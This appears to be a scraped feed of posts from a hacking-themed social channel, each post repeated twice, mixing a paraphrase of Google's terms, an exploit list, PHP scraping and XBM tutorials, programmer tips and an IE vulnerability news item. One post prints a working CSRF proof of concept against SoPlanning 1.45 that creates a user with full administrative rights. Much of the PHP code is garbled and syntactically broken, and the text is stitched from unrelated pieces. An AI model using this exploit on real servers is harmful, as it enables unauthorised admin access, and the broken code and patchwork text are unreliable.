β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ google.com Now new terms 20-feb-2020
t.me/UndercOdeTesting
>These terms help define the relationship between you and Google. Broadly speaking, we give you permission to use our services if you agree to follow these terms, which reflect how Googleβs business works and how we earn money. When we speak of βGoogle,β βwe,β βus,β and βour,β we mean Google LLC and its affiliates.
>We provide a broad range of services that are subject to these terms, including:
1) apps and sites (like Search and Maps)
2) platforms (like Google Play)
integrated services (like Maps embedded in other companiesβ apps or sites)
3) devices (like Google Home)
4) Our services are designed to work together, making it easier for you to move from one activity to the next. For example, Maps can remind you to leave for an appointment that appears in your Google Calendar.
SEE MORE ON Google Webiste
> https://policies.google.com/terms/update?utm_source=hpp&utm_medium=pushdown&utm_campaign=tosso
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ google.com Now new terms 20-feb-2020
t.me/UndercOdeTesting
>These terms help define the relationship between you and Google. Broadly speaking, we give you permission to use our services if you agree to follow these terms, which reflect how Googleβs business works and how we earn money. When we speak of βGoogle,β βwe,β βus,β and βour,β we mean Google LLC and its affiliates.
>We provide a broad range of services that are subject to these terms, including:
1) apps and sites (like Search and Maps)
2) platforms (like Google Play)
integrated services (like Maps embedded in other companiesβ apps or sites)
3) devices (like Google Home)
4) Our services are designed to work together, making it easier for you to move from one activity to the next. For example, Maps can remind you to leave for an appointment that appears in your Google Calendar.
SEE MORE ON Google Webiste
> https://policies.google.com/terms/update?utm_source=hpp&utm_medium=pushdown&utm_campaign=tosso
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 EXPLOITE Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
instagram.com/UndercOdeTestingCompany
0> The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
>user creation and for changing passwords (Specifically the admin password)
π¦ POC For aribtrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="1" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
<input type="hidden" name="xajaxargs[]" value="Test" />
<input type="hidden" name="xajaxargs[]" value="test" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="#FFFFFF" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
π¦ Use This Exploite for learn Only
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 EXPLOITE Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
instagram.com/UndercOdeTestingCompany
0> The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
>user creation and for changing passwords (Specifically the admin password)
π¦ POC For aribtrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="1" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
<input type="hidden" name="xajaxargs[]" value="Test" />
<input type="hidden" name="xajaxargs[]" value="test" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="#FFFFFF" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
π¦ Use This Exploite for learn Only
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Recenly 2020 Exploite CVE 2020 :
instagram.com/UndercOdeTestingCompany
2020-02-19 DBPower C300 HD Camera - Remote Configuration Disclosure WebApps
Hardware Todor Donev
2020-02-19 Virtual Freer 1.58 -
Remote Command Execution WebApps PHP SajjadBnd
2020-02-17 Anviz CrossChex -
Buffer Overflow (Metasploit) Remote Windows
Metasploit
2020-02-17 LabVantage 8.3 -
Information Disclosure WebApps Java Joel Aviad Ossi
2020-02-17 SOPlanning 1.45 - 'users' SQL Injection WebApps PHP
J3rryBl4nks
2020-02-17 Cuckoo Clock v5.0 - Buffer Overflow Local Windows
boku
2020-02-17 SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 WordPress Theme Fruitful 3.8 - Persistent Cross-Site
Scripting WebApps PHP Ultra Security Team
2020-02-17 Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 MSI Packages Symbolic Links Processing - Windows 10
Privilege Escalation Local Windows nu11secur1ty
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Recenly 2020 Exploite CVE 2020 :
instagram.com/UndercOdeTestingCompany
2020-02-19 DBPower C300 HD Camera - Remote Configuration Disclosure WebApps
Hardware Todor Donev
2020-02-19 Virtual Freer 1.58 -
Remote Command Execution WebApps PHP SajjadBnd
2020-02-17 Anviz CrossChex -
Buffer Overflow (Metasploit) Remote Windows
Metasploit
2020-02-17 LabVantage 8.3 -
Information Disclosure WebApps Java Joel Aviad Ossi
2020-02-17 SOPlanning 1.45 - 'users' SQL Injection WebApps PHP
J3rryBl4nks
2020-02-17 Cuckoo Clock v5.0 - Buffer Overflow Local Windows
boku
2020-02-17 SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 WordPress Theme Fruitful 3.8 - Persistent Cross-Site
Scripting WebApps PHP Ultra Security Team
2020-02-17 Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WebApps PHP J3rryBl4nks
2020-02-17 DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service
Path Local Windows boku
2020-02-17 MSI Packages Symbolic Links Processing - Windows 10
Privilege Escalation Local Windows nu11secur1ty
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How grab and analyse a file ?
2 parts :
twitter.com/UndercOdeTC
1) Grab and analyze a fileCrawl and analyze a file
crawl and analyze a file is very simple. This tutorial will guide you step by step to achieve it with an example. let's start!
2) First, I have to decide the URL address we will crawl. Can be set in a script or passed in $ QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$ Url = 'http://www.php.net' ;
?>
3) The second step, we crawl the specified file, and by file () function it exists in an array.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
?>
4) OK, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $ lines_array into a string. We can implement it using the implode (x, y) function. If you later want to use explode (set an array of string variables), it may be better to set x to "|" or "!" Or other similar delimiters. But for our purposes, it is best to set x to a space. y is another required parameter because it is the array you want to process with implode ().
<?
$ url = 'http:;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
?>
5) Now the fetching work is done, it is time to analyze it. For the purpose of this example, we want to get everything between <head> to </ head>. In order to parse out the string, we also need something called a regular expression.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " , $ lines_string ,$ head );
?>
π¦How grab and analyse a file ?
2 parts :
twitter.com/UndercOdeTC
1) Grab and analyze a fileCrawl and analyze a file
crawl and analyze a file is very simple. This tutorial will guide you step by step to achieve it with an example. let's start!
2) First, I have to decide the URL address we will crawl. Can be set in a script or passed in $ QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$ Url = 'http://www.php.net' ;
?>
3) The second step, we crawl the specified file, and by file () function it exists in an array.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
?>
4) OK, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $ lines_array into a string. We can implement it using the implode (x, y) function. If you later want to use explode (set an array of string variables), it may be better to set x to "|" or "!" Or other similar delimiters. But for our purposes, it is best to set x to a space. y is another required parameter because it is the array you want to process with implode ().
<?
$ url = 'http:;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
?>
5) Now the fetching work is done, it is time to analyze it. For the purpose of this example, we want to get everything between <head> to </ head>. In order to parse out the string, we also need something called a regular expression.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " , $ lines_string ,$ head );
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How grab and analyse a file ?
part 2 :
1) γLet's take a look at the code. As you can see, the eregi () function is executed in the following format:
eregi ("<head> (. *) </ Head>", $ lines_string, $ head);
2) γγ"(. *)" Means everything and can be explained For, "Analyze all things between <head> and </ head>". $ lines_string is the string we are analyzing, and $ head is the array where the analysis results are stored.
3) Finally, we can lose data. Because there is only one instance between <head> and </ head>, we can safely assume that there is only one element in the array, and that is what we want. Let's print it out.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " ,);
echo $ head [ 0 ];
?>
4) That's all there is to it.
<? php
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
preg_match_all ( "/ <body ([^>] . +?)> (. *) <\ / body> / is " , $ lines_string , $ m );
echo " <xmp> " ;
echo $ m [ 2 ] [ 0 ];
?>
π¦How grab and analyse a file ?
part 2 :
1) γLet's take a look at the code. As you can see, the eregi () function is executed in the following format:
eregi ("<head> (. *) </ Head>", $ lines_string, $ head);
2) γγ"(. *)" Means everything and can be explained For, "Analyze all things between <head> and </ head>". $ lines_string is the string we are analyzing, and $ head is the array where the analysis results are stored.
3) Finally, we can lose data. Because there is only one instance between <head> and </ head>, we can safely assume that there is only one element in the array, and that is what we want. Let's print it out.
<?
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
eregi ( "<head> (. *) </ head> " ,);
echo $ head [ 0 ];
?>
4) That's all there is to it.
<? php
$ url = 'http://www.php.net' ;
$ lines_array = file ( $ url );
$ lines_string = implode ( '' , $ lines_array );
preg_match_all ( "/ <body ([^>] . +?)> (. *) <\ / body> / is " , $ lines_string , $ m );
echo " <xmp> " ;
echo $ m [ 2 ] [ 0 ];
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crawl and analysis a simple file :)
instagram.com/UndercOdeTestingCompany
It is very simple to scrape and analyze a file. This tutorial will guide you step by step to achieve it with an example. let's start!
π¦ ππΌππ πππΈβπ
1) First, I have to decide the URL address we will crawl. Can be set in a script or passed in $ QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$ url = 'http://www.php.net'
;?> In the
2) second step, we grab the specified file and store it in an array using the file () function.
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
?>
3) OK, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $ lines_array into a string. We can implement it using the implode (x, y) function. If you later want to use explode (set an array of string variables), it may be better to set x to "|" or "!" Or other similar delimiters. But for our purposes, it is best to set x to a space. y is another required parameter because it is the array you want to process with implode ().
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
$ lines_string = implode ('', $ lines_array);
?>
π¦ Crawl and analysis a simple file :)
instagram.com/UndercOdeTestingCompany
It is very simple to scrape and analyze a file. This tutorial will guide you step by step to achieve it with an example. let's start!
π¦ ππΌππ πππΈβπ
1) First, I have to decide the URL address we will crawl. Can be set in a script or passed in $ QUERY_STRING. For simplicity, let's set the variables directly in the script.
<?
$ url = 'http://www.php.net'
;?> In the
2) second step, we grab the specified file and store it in an array using the file () function.
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
?>
3) OK, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $ lines_array into a string. We can implement it using the implode (x, y) function. If you later want to use explode (set an array of string variables), it may be better to set x to "|" or "!" Or other similar delimiters. But for our purposes, it is best to set x to a space. y is another required parameter because it is the array you want to process with implode ().
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
$ lines_string = implode ('', $ lines_array);
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crawl and analysis a simple file Part 2 :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
1) Now that the crawling is done, it's time to analyze it. For the purpose of this example, we want to get everything between <head> to </ head>. In order to parse out the string, we also need something called a regular expression.
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
$ lines_string = implode ('', $ lines_array);
eregi ("<head> (. *) </ head> ", $ lines_string, $ head);
?>
2) Let's take a look at the code. As you can see, the eregi () function is executed in the following format:
eregi ("<head> (. *) </ Head>", $ lines_string, $ head);
γγ"(. *)" Means everything and can be explained For, "Analyze all things between <head> and </ head>". $ lines_string is the string we are analyzing, and $ head is the array where the analysis results are stored.
3) Finally, we can lose data. Because there is only one instance between <head> and </ head>, we can safely assume that there is only one element in the array, and that is what we want. Let's print it out.
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
eregi ("<head> (. *) </ head>", $ lines_string, $ head);
echo $ head [0];
?>
γγThis is all the code.
π¦ Crawl and analysis a simple file Part 2 :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
1) Now that the crawling is done, it's time to analyze it. For the purpose of this example, we want to get everything between <head> to </ head>. In order to parse out the string, we also need something called a regular expression.
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
$ lines_string = implode ('', $ lines_array);
eregi ("<head> (. *) </ head> ", $ lines_string, $ head);
?>
2) Let's take a look at the code. As you can see, the eregi () function is executed in the following format:
eregi ("<head> (. *) </ Head>", $ lines_string, $ head);
γγ"(. *)" Means everything and can be explained For, "Analyze all things between <head> and </ head>". $ lines_string is the string we are analyzing, and $ head is the array where the analysis results are stored.
3) Finally, we can lose data. Because there is only one instance between <head> and </ head>, we can safely assume that there is only one element in the array, and that is what we want. Let's print it out.
<?
$ url = 'http://www.php.net';
$ lines_array = file ($ url);
eregi ("<head> (. *) </ head>", $ lines_string, $ head);
echo $ head [0];
?>
γγThis is all the code.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Seven elements of being a successful programmer
pintererst.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ
1) First, low commitment, high realization: If your commitment is indeed what the manager wants to hear, he will like you. However, he will not like you any more if the software is not delivered in a timely manner as promised.
2) Second, don't put errors in software: Good programmers don't put errors in their code.
3) Third, full of enthusiasm and hard work: Excellent programmers are full of enthusiasm and hard work, they are highly organized, and pay attention to methods, they have the ability to structure things. Moreover, the enthusiasm of most programmers for their hard work is incredible.
4) Fourth, know the unknown factors.
5) Fifth, get along well with team members: Software development is the result of team members' coordinated efforts.
6) Six, good beginning, good end, towards the ultimate goal: always towards the ultimate goal is a very important ability. When interviewing someone for work,
one thing you're looking for is the work he actually participated in on the product the group has already delivered.
7) Seven, learning the emerging technology: Excellent developers are people who are eager to learn.
π¦ Seven elements of being a successful programmer
pintererst.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ
1) First, low commitment, high realization: If your commitment is indeed what the manager wants to hear, he will like you. However, he will not like you any more if the software is not delivered in a timely manner as promised.
2) Second, don't put errors in software: Good programmers don't put errors in their code.
3) Third, full of enthusiasm and hard work: Excellent programmers are full of enthusiasm and hard work, they are highly organized, and pay attention to methods, they have the ability to structure things. Moreover, the enthusiasm of most programmers for their hard work is incredible.
4) Fourth, know the unknown factors.
5) Fifth, get along well with team members: Software development is the result of team members' coordinated efforts.
6) Six, good beginning, good end, towards the ultimate goal: always towards the ultimate goal is a very important ability. When interviewing someone for work,
one thing you're looking for is the work he actually participated in on the product the group has already delivered.
7) Seven, learning the emerging technology: Excellent developers are people who are eager to learn.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now :Microsoft releases security update for Windows 7 due to severe IE vulnerabilityπ
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
1) Microsoft releases security update for Windows 7 due to severe IE vulnerability
2) Both Windows 7 and IE browsers have stopped supporting last month, but due to the latest serious IE vulnerability, Microsoft decided to provide security patches for Windows 7 system again. After discovering a JavaScript engine vulnerability that was widely used by hackers, Microsoft decided to provide security updates for all older browsers before IE
3) This remote code execution vulnerability exists in the memory of IE processing script engine objects. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
4) If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install the program. View, change or delete data; or create a new account with full user rights.
5) In a cyber attack scenario, an attacker could create a specially crafted website that specifically exploits the IE vulnerability, and then convince users to view the website. An attacker could access an application hosted on the IE rendering engine or an ActiveX control labeled "Initial Security" embedded in Microsoft Office office documents. Attackers may also use infected websites to accept or host user-provided content or advertisements. These websites may contain specially crafted content that could exploit this vulnerability.
6) The exploit can be triggered by any application that can host HTML, such as documents or PDFs, and has a "critical" rating on Windows 7, 8.1, and 10, and is currently widely used by hackers. Microsoft will release patches for all of these operating systems as well as Windows
π¦ Now :Microsoft releases security update for Windows 7 due to severe IE vulnerabilityπ
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
1) Microsoft releases security update for Windows 7 due to severe IE vulnerability
2) Both Windows 7 and IE browsers have stopped supporting last month, but due to the latest serious IE vulnerability, Microsoft decided to provide security patches for Windows 7 system again. After discovering a JavaScript engine vulnerability that was widely used by hackers, Microsoft decided to provide security updates for all older browsers before IE
3) This remote code execution vulnerability exists in the memory of IE processing script engine objects. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
4) If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install the program. View, change or delete data; or create a new account with full user rights.
5) In a cyber attack scenario, an attacker could create a specially crafted website that specifically exploits the IE vulnerability, and then convince users to view the website. An attacker could access an application hosted on the IE rendering engine or an ActiveX control labeled "Initial Security" embedded in Microsoft Office office documents. Attackers may also use infected websites to accept or host user-provided content or advertisements. These websites may contain specially crafted content that could exploit this vulnerability.
6) The exploit can be triggered by any application that can host HTML, such as documents or PDFs, and has a "critical" rating on Windows 7, 8.1, and 10, and is currently widely used by hackers. Microsoft will release patches for all of these operating systems as well as Windows
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Make an xbm picturexbm is a simple two-color bitmap image format, use more early cgi, the current used for the counter
By UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ
<PHP?
setXBM (1234567890,0);
function setXBM (NUM $, $ MODE = 0) {
setType ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
π¦ Make an xbm picturexbm is a simple two-color bitmap image format, use more early cgi, the current used for the counter
By UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ
<PHP?
setXBM (1234567890,0);
function setXBM (NUM $, $ MODE = 0) {
setType ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ String manipulation functionsThere are many string manipulation functions in PHP 3.0, the most important are the following:
pinterest.com/UndercOdeOfficial
1) echo, print, printf, sprintf are
used to output strings. If there is a variable name in the string, it is replaced with its value. The latter two functions are similar to C's functions of the same name.
2) strchr, strlen, strtok, strrchr, strrev, strstr, strtolower, strtoupper, substr, ucfirst
string manipulation functions, some of them have exactly the same meaning as the functions of the same name in C strrev is to flip a string. strtolower and strtoupper are to convert the string to lowercase and uppercase. ucfirst is to convert the first character of the string to uppercase. substr is a substring of the returned string, usage is: substr (String, head, length). The head position is counted from 0. If it is negative, it means counting from the tail to the front.
3) Chr, Ord
function with the same name.
4) explode, implement, join
and Functions related to arrays. Explode (string, delimiter) returns an array produced by dividing a string at a delimiter. Implode (array, delimiter) returns a result of inserting a delimiter between the elements of an array string implode and join the same meaning.
5) Chop
processing . Trailing white space
6) htmlspecialchars
the HTML special characters into their names, such as "<" to "& lt;".
7) Add "<BR>" in front of each carriage return in HTML.
AddSlashes, StripSlashes
8) Add "\" and remove "\" to the string as required. For some databases, you must query the Characters can be queried after adding and removing "\".
9) parse_str
analyzes strings of type "name1 = value1 & name2 = value2 & ..." into variables.
> For example: parse_str ("a = 1 & b = 2"); Generate $ a and $ b variables with values of 1,2. If two pairs of names / values have the same name part, the value of the latter overwrites the previous one. If both ends of the name have "[ ] ", Such as" a [] =
π¦ String manipulation functionsThere are many string manipulation functions in PHP 3.0, the most important are the following:
pinterest.com/UndercOdeOfficial
1) echo, print, printf, sprintf are
used to output strings. If there is a variable name in the string, it is replaced with its value. The latter two functions are similar to C's functions of the same name.
2) strchr, strlen, strtok, strrchr, strrev, strstr, strtolower, strtoupper, substr, ucfirst
string manipulation functions, some of them have exactly the same meaning as the functions of the same name in C strrev is to flip a string. strtolower and strtoupper are to convert the string to lowercase and uppercase. ucfirst is to convert the first character of the string to uppercase. substr is a substring of the returned string, usage is: substr (String, head, length). The head position is counted from 0. If it is negative, it means counting from the tail to the front.
3) Chr, Ord
function with the same name.
4) explode, implement, join
and Functions related to arrays. Explode (string, delimiter) returns an array produced by dividing a string at a delimiter. Implode (array, delimiter) returns a result of inserting a delimiter between the elements of an array string implode and join the same meaning.
5) Chop
processing . Trailing white space
6) htmlspecialchars
the HTML special characters into their names, such as "<" to "& lt;".
7) Add "<BR>" in front of each carriage return in HTML.
AddSlashes, StripSlashes
8) Add "\" and remove "\" to the string as required. For some databases, you must query the Characters can be queried after adding and removing "\".
9) parse_str
analyzes strings of type "name1 = value1 & name2 = value2 & ..." into variables.
> For example: parse_str ("a = 1 & b = 2"); Generate $ a and $ b variables with values of 1,2. If two pairs of names / values have the same name part, the value of the latter overwrites the previous one. If both ends of the name have "[ ] ", Such as" a [] =
Written by UndercOde
